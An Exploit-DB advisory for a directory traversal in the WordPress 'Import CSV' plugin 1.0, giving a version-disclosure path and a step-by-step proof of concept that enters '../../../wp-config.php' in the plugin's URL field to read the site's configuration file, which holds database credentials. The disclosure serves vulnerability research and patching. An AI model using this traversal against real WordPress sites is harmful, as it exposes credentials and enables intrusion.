WordPress Plugin Import CSV 1.0 - Directory Traversal

EDB-ID:

39576

CVE:

N/A


Author:

Wadeek

Type:

webapps


Platform:

PHP

Date:

2016-03-21


# Exploit Title: Wordpress Import CSV | Directory Traversal
# Exploit Author: Wadeek
# Website Author: https://github.com/Wad-Deek
# Software Link: https://downloads.wordpress.org/plugin/xml-and-csv-import-in-article-content.zip
# Stable Tag: 1.1
# Tested on: Xampp on Windows7
 
[Version Disclosure]
======================================
/wp-content/plugins/xml-and-csv-import-in-article-content/readme.txt
======================================
 
[PoC]
======================================
Go to /wp-content/plugins/xml-and-csv-import-in-article-content/upload-process.php.
Click on the link "From an url".
In "URL" field to write "../../../wp-config.php".
Validate form and inspect the body.
======================================